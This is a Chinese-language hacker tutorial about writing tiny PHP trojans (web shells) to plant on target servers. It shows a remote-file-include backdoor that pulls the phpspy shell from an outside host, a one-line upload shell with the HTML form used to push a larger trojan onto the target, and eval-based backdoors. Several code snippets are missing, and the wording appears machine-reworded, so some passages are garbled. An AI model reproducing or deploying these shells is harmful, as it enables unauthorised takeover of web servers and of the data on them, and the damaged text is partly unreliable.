频道栏目
首页 > 资讯 > 文件上传漏洞 > 正文

黑客教程系列之微型PHP木马的探讨

16-01-07        来源:[db:作者]  
收藏   我要投稿

【编纂提示】:此文仅供参考学习之用!

本文没有什么特别之处,仅求抛砖引玉。并送给和我一样菜的在PHP门边徘徊的朋友。刚学PHP没几天,我就急于功成,所以有错误及不足之处请大家积极指出。

PHP语法的强盛是ASP瞠乎其后的,仅一个:就可以刺探全部服务器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密,我还没想到,但是对于写一个微型PHP木马,我想还是很难被杀的。

这里简略探讨一下几个函数可以作为木马的应用:

1. 可以运行外部命令的几个函数:system,passthru,exec,shell_exec,popen。

例:只要将等保留为cmd.php及可实现运行外部命令的功效。这几个函数可以说是最早的微行php木马了,所以一般虚拟主机的设置也会将这些函数屏蔽的。

2.还记得WDB论坛的style.php的漏洞吗?我们可以利用这个做个很难被杀的小木马。如下:

 

<?php include($include);?>

将其保留为1.php,我们就可以调用其他不支撑php服务器里的.php木马(如phpspy.php)来达到我们的目标:http://target.com/1.php? Include=http://www.***.com/phpspy.php

这里http://www.918x.com是不支撑php的,否则将会在http://www.***.com这台服务器运行phpspy.php,而不是目标服务器。

3. 这个还是angel在Discuz 2.2F的攻击中给我们的一个非常好的上传木马,我没有改:

 

<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>

将其保留为up.php后,在本地提交表单:

 

<form ENCTYPE='multipart/form-data' ACTION='http://目标服务器/up.php' METHOD='POST'>
<input NAME='MyFile' TYPE='file'>
<input VALUE=' 提交 ' TYPE='submit'>
</form>

就可以把大个的php木马上传上往。

4. 我一直在想有没有同冰狐浪子的那个ASP一句话木马一样通过本地表单提交运行的PHP木马。终于找到了函数:eval,在PHP4中文参考手册上它的语法阐明:

语法:

 

void eval(string code_str);
 

内容阐明:本函数可将字符串之中的变量值代进,通常用在处理数据库的材料上。参数 code_str 为欲处理的字符串。值得留心的是待处理的字符串要符合 PHP 的字符串格局,同时在结尾处要有分号。应用本函数处理后的字符串会沿续到 PHP 程序结束。

我们可以在目标主机上保留:为一个PHP文件(我想也可以插在PHP任意文件里)。然后通过本地提交来达到目标,但与ASP不同的是,在magic_quotes_gpc = on的时候,过滤的很多的字符,使得这个应用功效大大的缩小。

对于这个PHP木马本地表单我做了很多次,还没有成熟的代码。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP木马是无须质疑的。

PS:写完后,有人告诉我,实在高手早就有微型的PHP木马了,只是没有公然。哎,我好愁闷啊,研究的都是人家早就有了的成果。不管怎么样,和大家分享一下我的研究,盼看能得到帮助和指教。


                
相关TAG标签
上一篇:怎么从url中获取一个网址,然后跳转到这个网址去
下一篇:打开PHP调试
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站